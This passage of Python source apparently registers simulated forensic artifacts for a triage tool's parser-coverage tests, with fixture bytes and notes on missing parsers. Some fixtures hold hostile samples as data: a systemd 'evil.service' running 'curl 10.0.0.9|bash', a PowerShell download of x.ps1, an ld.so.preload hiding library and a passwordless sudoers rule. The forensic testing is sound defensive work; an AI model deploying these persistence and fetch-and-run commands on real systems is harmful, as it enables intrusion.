    _a("teams", "teams/jdoe/logs.txt", TIMESTAMPED_LOG, "timestamped_log"),
    _a(
        "teams",
        "teams/jdoe/IndexedDB/000003.log",
        b"\x00" * 64,
        None,
        gap="Teams/Slack/Discord LevelDB stores hold message bodies; needs one "
        "shared LevelDB parser",
    ),
    _a("slack", "slack/jdoe/default.log", TIMESTAMPED_LOG, "timestamped_log"),
    _a("discord", "discord/jdoe/000003.ldb", b"\x00" * 64, None, gap="see teams LevelDB"),
    _a(
        "signal",
        "signal/jdoe/db.sqlite",
        SQLITE,
        None,
        gap="Signal Desktop DB is SQLCipher-encrypted; only metadata is feasible "
        "without the key from the local keychain",
    ),
    _a(
        "whatsapp",
        "whatsapp/jdoe/msgstore.db",
        SQLITE,
        None,
        gap="WhatsApp Desktop msgstore is plain SQLite — message timeline is "
        "directly parseable; no parser yet",
    ),
    _a(
        "telegram",
        "telegram/jdoe/D877F783D5D3EF8C",
        b"TDF$" + b"\x00" * 200,
        None,
        gap="Telegram tdata is a custom encrypted container; inventory only",
    ),
    _a(
        "cloud_onedrive",
        "cloud_onedrive/jdoe/SyncEngineDatabase.db",
        SQLITE,
        None,
        gap="OneDrive/GDrive/Dropbox sync DBs prove which files left the host — "
        "the core exfil question; need SQLite parsers",
    ),
    _a(
        "cloud_onedrive",
        "cloud_onedrive/jdoe/SyncDiagnostics.log",
        TIMESTAMPED_LOG,
        "timestamped_log",
    ),
    _a(
        "cloud_google_drive",
        "cloud_google_drive/jdoe/metadata_sqlite_db",
        SQLITE,
        None,
        gap="see cloud_onedrive",
    ),
    _a("cloud_dropbox", "cloud_dropbox/jdoe/filecache.db", SQLITE, None, gap="see cloud_onedrive"),
    _a(
        "cloud_dropbox",
        "cloud_dropbox/jdoe/info.json",
        b'{"personal":{"path":"/Users/jdoe/Dropbox","host":1234567890}}\n',
        "json_file",
        mime="application/json",
    ),
    _a(
        "remote_access",
        "remote_access/teamviewer/TeamViewer15_Logfile.log",
        TIMESTAMPED_LOG,
        "timestamped_log",
    ),
    _a("remote_access", "remote_access/anydesk/jdoe/ad.trace", TIMESTAMPED_LOG, "timestamped_log"),
    _a(
        "remote_access",
        "remote_access/anydesk/jdoe/service.conf",
        b"ad.anynet.relay_shown=true\nad.roster.items=123456789\n",
        "linux_config",
    ),
    _a(
        "rdp",
        "rdp/jdoe/Cache0000.bin",
        b"RDP8bmp\x00" + b"\x00" * 200,
        None,
        gap="RDP bitmap cache reconstructs what an operator saw over RDP; needs "
        "a tile parser (bmc-tools equivalent)",
    ),
    _a("ssh_ftp", "ssh_ftp/jdoe/ssh/known_hosts", SSH_AUTHORIZED_KEYS, "linux_config"),
    _a(
        "ssh_ftp",
        "ssh_ftp/jdoe/WinSCP.ini",
        b"[Configuration\\\\CDCache]\nsessions=1\n[Sessions\\\\root@10.0.0.9]\n"
        b"HostName=10.0.0.9\nUserName=root\n",
        "linux_config",
    ),
    _a(
        "office",
        "office/jdoe/Settings.json",
        b'{"MRU":[{"path":"C:\\\\Users\\\\jdoe\\\\secret.docx","ts":"2026-01-15T10:00:01Z"}]}\n',
        "json_file",
        mime="application/json",
    ),
    _a("iis_web", "iis_web/W3SVC1/u_ex260115.log", IIS_LOG, "windows_triage"),
    _a(
        "iis_web",
        "iis_web/applicationHost.config",
        b'<?xml version="1.0"?>\n<configuration><system.applicationHost>'
        b"<sites/></system.applicationHost></configuration>\n",
        "json_file",
    ),
    _a(
        "active_directory",
        "active_directory/ntds.dit",
        ESE,
        None,
        gap="NTDS.dit is the domain credential and object store; needs the shared ESE reader",
    ),
    _a("dev_tools", "dev_tools/jdoe/.gitconfig", GITCONFIG, "linux_config"),
    _a(
        "dev_tools",
        "dev_tools/jdoe/ConsoleHost_history.txt",
        b"whoami\nInvoke-WebRequest http://10.0.0.9/x.ps1 -OutFile x.ps1\n",
        "shell_history",
    ),
    _a(
        "dev_tools",
        "dev_tools/jdoe/azure_accessTokens.json",
        b'[{"tokenType":"Bearer","expiresOn":"2026-01-15 11:00:01.000000",'
        b'"userId":"jdoe@corp.example"}]\n',
        "json_file",
        mime="application/json",
    ),
    _a(
        "password_managers",
        "password_managers/jdoe/vault.kdbx",
        KDBX,
        None,
        gap="KDBX is encrypted; inventory event only (presence, size, mtime)",
    ),
    _a("vpn", "vpn/openvpn/corp.ovpn", OVPN, "linux_config"),
    _a(
        "vpn",
        "vpn/wireguard/wg0.conf",
        b"[Interface]\nAddress = 10.9.0.2/32\n[Peer]\nEndpoint = 10.0.0.9:51820\n",
        "linux_config",
    ),
    # Untimestamped key/value text — json_file's text path is the correct floor.
    _a(
        "encryption",
        "encryption/BDE-Recovery.txt",
        b"BitLocker Drive Encryption recovery key\nIdentifier: ABC-123\n",
        "json_file",
    ),
    _a("boot_uefi", "boot_uefi/BCD", REGF, "registry"),
    _a(
        "boot_uefi",
        "boot_uefi/bootstat.dat",
        b"\x00" * 512,
        None,
        gap="bootstat records boot/shutdown outcomes; low value, inventory only",
    ),
    _a("win_logs", "win_logs/CBS.log", CBS_LOG, "syslog"),
    _a("win_logs", "win_logs/WindowsUpdate.log", TIMESTAMPED_LOG, "syslog"),
    _a("win_logs", "win_logs/panther/setupact.log", TIMESTAMPED_LOG, "timestamped_log"),
    _a(
        "memory_artifacts",
        "memory_artifacts/pagefile.sys",
        b"\x00" * 4096,
        None,
        gap="pagefile/hiberfil are analysed by the Anvil volatility3 module, not "
        "parsed into a timeline — strings is the intended floor",
    ),
    _a(
        "memory_artifacts",
        "memory_artifacts/hiberfil.sys",
        b"HIBR" + b"\x00" * 4092,
        None,
        gap="see pagefile.sys",
    ),
    _a(
        "etw_diagnostics",
        "etw_diagnostics/ShutdownTrace.etl",
        ETL,
        None,
        gap="ETL trace buffers need an ETW decoder plus provider manifests",
    ),
    _a(
        "windows_apps",
        "windows_apps/jdoe/StickyNotes/plum.sqlite",
        SQLITE,
        None,
        gap="UWP app SQLite stores (Sticky Notes, Mail) hold user content; needs "
        "a generic SQLite table walker",
    ),
    _a("wsl", "wsl/jdoe/passwd", LINUX_PASSWD, "linux_config"),
    _a(
        "wsl",
        "wsl/jdoe/bash.bashrc",
        b"export PATH=$PATH:/opt/x\nalias ll='ls -la'\n",
        "linux_config",
    ),
    _a(
        "virtualization",
        "virtualization/hyperv/vm1.vhdx",
        VHDX,
        None,
        gap="VHD/VHDX should recurse into the diskimage parser so a nested guest "
        "is triaged like any image",
    ),
    _a(
        "recovery",
        "recovery/svi/{3808876b-c176-4e48-b7ae-04046e6cc752}",
        b"\x00" * 512,
        None,
        gap="VSS store blobs need a shadow-copy reader before anything inside is reachable",
    ),
    _a(
        "database_clients",
        "database_clients/jdoe/DBeaverData/data-sources.xml",
        b'<?xml version="1.0"?>\n<data-sources><data-source name="prod" '
        b'url="jdbc:postgresql://10.0.0.9:5432/app"/></data-sources>\n',
        "json_file",
    ),
    _a("gaming", "gaming/epic/EpicGamesLauncher.log", TIMESTAMPED_LOG, "timestamped_log"),
    _a(
        "gaming",
        "gaming/steam/jdoe/loginusers.vdf",
        VDF,
        None,
        gap="Steam VDF is a keyvalue tree naming accounts and last-login times; low priority",
    ),
    _a(
        "printing",
        "printing/00001.SHD",
        b"\x67\x00\x00\x00" + b"\x00" * 200,
        None,
        gap="print spool SHD/SPL names the document, owner and printer — direct "
        "evidence of physical exfil; needs a parser",
    ),
    _a("markofweb", "downloads/jdoe/x.exe:Zone.Identifier", MARKOFWEB, "markofweb"),
    # ══ Linux ════════════════════════════════════════════════════════════════
    _a("logs", "logs/syslog", SYSLOG, "syslog"),
    _a("logs", "logs/auth.log", SYSLOG, "syslog"),
    _a("logs", "logs/journal.log", SYSLOG, "syslog"),
    _a("logs", "logs/utmp", UTMP, "utmp"),
    _a("logs", "logs/wtmp", UTMP, "utmp"),
    _a("logs", "logs/lastlog", LASTLOG, "lastlog"),
    _a("logs", "apache2/access.log", ACCESS_LOG, "access_log"),
    _a("logs", "nginx/access.log", ACCESS_LOG, "access_log"),
    _a("history", "history/jdoe/.bash_history", SHELL_HISTORY, "shell_history"),
    _a("history", "history/jdoe/.zsh_history", BASH_HISTORY_TS, "shell_history"),
    _a("config", "config/passwd", LINUX_PASSWD, "linux_config"),
    _a(
        "config",
        "config/fstab",
        b"UUID=abc / ext4 defaults 0 1\n10.0.0.9:/share /mnt nfs defaults 0 0\n",
        "linux_config",
    ),
    _a("config", "config/sudoers.d/admin", b"jdoe ALL=(ALL) NOPASSWD: ALL\n", "linux_config"),
    _a("config", "config/proc/modules", b"nf_tables 262144 1 - Live 0x0000\n", "linux_triage"),
    _a(
        "config",
        "config/proc/mounts",
        b"/dev/sda1 / ext4 rw,relatime 0 0\n10.0.0.9:/share /mnt nfs4 rw 0 0\n",
        "linux_config",
    ),
    _a(
        "config",
        "config/proc/net_arp",
        b"IP address       HW type     Flags       HW address            Mask     Device\n"
        b"10.0.0.9         0x1         0x2         de:ad:be:ef:00:01     *        eth0\n",
        "linux_triage",
    ),
    _a("cron", "cron/crontabs/root", CRONTAB, "linux_config"),
    _a("cron", "cron/cron.d/backup", CRONTAB, "linux_config"),
    _a("ssh", "ssh/jdoe/authorized_keys", SSH_AUTHORIZED_KEYS, "linux_config"),
    _a("audit_logs", "audit/audit.log", AUDITD, "auditd"),
    _a(
        "audit_logs",
        "audit/rules.d/audit.rules",
        b"-w /etc/passwd -p wa -k identity\n-a always,exit -F arch=b64 -S execve -k exec\n",
        None,
        gap="auditd rule files describe what WAS being watched — essential for "
        "judging a log gap; needs a small rules parser",
    ),
    _a(
        "audit_logs",
        "audit/lastlog.txt",
        b"Username         Port     From             Latest\n"
        b"root             pts/0    10.0.0.9         Thu Jan 15 10:00:01 +0000 2026\n"
        b"daemon                                    **Never logged in**\n",
        "linux_triage",
    ),
    _a("iptables", "network_config/iptables_rules.txt", IPTABLES_RULES, "iptables"),
    _a("iptables", "logs/kern.log", IPTABLES_LOG, "syslog"),
    _a(
        "network_config",
        "network_config/proc_net/tcp",
        b"  sl  local_address rem_address   st tx_queue:rx_queue tr tm->when retrnsmt"
        b"   uid  timeout inode\n"
        b"   0: 0500000A:AD31 0900000A:1160 01 00000000:00000000 00:00000000 00000000"
        b"     0        0 12345 1 0000 100 0 0 10 0\n"
        b"   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000"
        b"     0        0 9876 1 0000 100 0 0 10 0\n",
        "linux_triage",
    ),
    _a(
        "network_config",
        "network_config/ss_listening.txt",
        b"State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process\n"
        b"LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         "
        b'users:(("sshd",pid=901,fd=3))\n',
        "linux_triage",
    ),
    _a(
        "network_config",
        "network_config/ip_addr.json",
        b'[{"ifname":"eth0","operstate":"UP","address":"de:ad:be:ef:00:02","mtu":1500,'
        b'"addr_info":[{"family":"inet","local":"10.0.0.5","prefixlen":24,"scope":"global"}]}]\n',
        "linux_triage",
        mime="application/json",
    ),
    _a(
        "network_config",
        "network_config/ip_route.json",
        b'[{"dst":"default","gateway":"10.0.0.1","dev":"eth0","protocol":"dhcp","metric":100}]\n',
        "linux_triage",
        mime="application/json",
    ),
    _a(
        "network_config",
        "network_config/ip_neigh.json",
        b'[{"dst":"10.0.0.9","dev":"eth0","lladdr":"de:ad:be:ef:00:01","state":["REACHABLE"]}]\n',
        "linux_triage",
        mime="application/json",
    ),
    _a(
        "persistence",
        "persistence/systemd/system/evil.service",
        b"[Unit]\nDescription=evil\n[Service]\n"
        b"ExecStart=/bin/bash -c 'curl 10.0.0.9|bash'\n[Install]\n"
        b"WantedBy=multi-user.target\n",
        "linux_config",
    ),
    _a("persistence", "persistence/ld.so.preload", b"/tmp/.x/libhide.so\n", "linux_config"),
    _a("containers", "containers/logs/docker_abc123def456.txt", DOCKER_JSON_LOG, "docker"),
    _a(
        "containers",
        "containers/inspect/docker_abc123def456.json",
        DOCKER_INSPECT,
        "docker",
        mime="application/json",
    ),
    _a("containers", "containers/compose/app/docker-compose.yml", COMPOSE_YAML, "json_file"),
    _a(
        "containers",
        "containers/docker_ps.json",
        b'{"ID":"abc123def456","Image":"nginx:latest","Names":"web","Status":"Up 2 hours",'
        b'"Command":"nginx -g \'daemon off;\'","Ports":"0.0.0.0:80->80/tcp"}\n',
        "docker",
        mime="application/json",
    ),
    _a(
        "containers",
        "containers/container_sockets.txt",
        b"Found: /var/run/docker.sock\nFound: /run/containerd/containerd.sock\n",
        "docker",
    ),
    _a("packages", "apt/history.log", APT_HISTORY, "apt_history"),
    _a(
        "packages",
        "packages/dpkg_list.txt",
        b"ii  netcat-openbsd  1.206-1  amd64  TCP/IP swiss army knife\n",
        "linux_triage",
    ),
    _a(
        "packages",
        "packages/recent_installs.txt",
        b"2026-01-15 10:00:01 install netcat-openbsd:amd64 <none> 1.206-1\n",
        "linux_triage",
    ),
    _a("suricata", "suricata/eve.json", SURICATA_EVE, "suricata", mime="application/json"),
    _a("zeek", "zeek/conn.log", ZEEK_CONN, "zeek"),
    _a("zeek", "zeek/dns.log", ZEEK_CONN, "zeek"),
    _a(
        "triage",
        "system_triage.txt",
        b"=== uname -a ===\nLinux web01 6.1.0-18-amd64 #1 SMP x86_64 GNU/Linux\n"
        b"=== hostname ===\nweb01\n",
        "linux_triage",
    ),
    _a(
        "persistence",
        "persistence/enabled_services.txt",
        b"UNIT FILE                 STATE\nsshd.service              enabled\n"
        b"evil.service              enabled\n",
        "linux_triage",
    ),
    _a("network", "network/capture.pcap", PCAP, "pcap"),
    _a("network", "network/capture.pcapng", PCAPNG, "pcap"),
    # dd_image claims a raw dump and carves it; deep memory analysis remains the
    # Anvil volatility3 module's job.
    _a("memory", "memory/mem.raw", b"\x00" * 4096, "dd_image"),
    _a(
        "memory",
        "memory/mem.lime",
        b"EMiL" + b"\x00" * 4092,
        None,
        gap="LiME format dumps are volatility3 territory; no timeline parser",
    ),
    _a(
        "user_artifacts",
        "user/jdoe/.gnupg/pubring.kbx",
        b"\x00\x00\x00\x20\x01\x01KBXf" + b"\x00" * 200,
        None,
        gap="GnuPG keybox lists key owners and creation times; low priority",
    ),
    # ══ macOS ════════════════════════════════════════════════════════════════
    _a(
        "logs",
        "logs/unified_logs.ndjson",
        UNIFIED_LOG_NDJSON,
        "macos_uls",
        mime="application/x-ndjson",
    ),
    _a(
        "logs",
        "logs/unified_logs.log",
        UNIFIED_LOG_TEXT,
        "macos_uls",
        mime="text/plain",
    ),
    _a("logs", "logs/system.log", SYSLOG, "syslog", mime="text/plain"),
    _a("logs", "logs/install.log", MACOS_INSTALL_LOG, "syslog", mime="text/plain"),
    _a("logs", "logs/wifi.log", MACOS_WIFI_LOG, "syslog", mime="text/plain"),
    _a("triage", "system_triage.txt", MACOS_TRIAGE, "macos_triage", mime="text/plain"),
    _a(
        "browser",
        "browser/tmoll/safari/History.db",
        SAFARI_HISTORY_DB,
        "browser",
        mime="application/vnd.sqlite3",
    ),
    _a("history", "history/tmoll/.zsh_history", SHELL_HISTORY, "shell_history", mime="text/plain"),
    _a("config", "config/SystemVersion.plist", BPLIST, "plist"),
    _a("plist", "plist/Library/Preferences/com.apple.loginwindow.plist", XML_PLIST, "plist"),
    _a("plist", "plist/Library/Preferences/com.apple.dock.plist", BPLIST, "plist"),
    _a("launchagents", "launchagents/LaunchDaemons/com.evil.agent.plist", XML_PLIST, "plist"),
    # ══ Cross-platform / images / cloud ══════════════════════════════════════
    _a("external_disk", "diskimage/disk.dd", b"\x00" * 4096, "dd_image"),
    _a(
        "external_disk",
        "diskimage/disk.E01",
        b"EVF\x09\x0d\x0a\xff\x00" + b"\x00" * 500,
        "diskimage",
    ),
    _a(
        "cloud_audit",
        "cloud/aws_cloudtrail.json",
        CLOUD_TRAIL,
        "cloud_audit",
        mime="application/json",
    ),
    _a("plaso", "timeline/case.plaso", SQLITE, "plaso"),
    _a(
        "hayabusa",
        "hayabusa/timeline.jsonl",
        b'{"Timestamp":"2026-01-15 10:00:01.000 +00:00","RuleTitle":"Susp PowerShell",'
        b'"Level":"high","Computer":"WIN01","Channel":"Security","EventID":"4104"}\n',
        "hayabusa",
        mime="application/x-ndjson",
    ),
]


def by_category() -> dict[str, list[Artifact]]:
    out: dict[str, list[Artifact]] = {}
    for art in ARTIFACTS:
        out.setdefault(art.category, []).append(art)
    return out


def open_gaps() -> list[Artifact]:
    """Artifacts with no dedicated parser yet — the bijection's outstanding debt."""
    return [a for a in ARTIFACTS if a.parser is None]


def covered() -> list[Artifact]:
    return [a for a in ARTIFACTS if a.parser is not None]
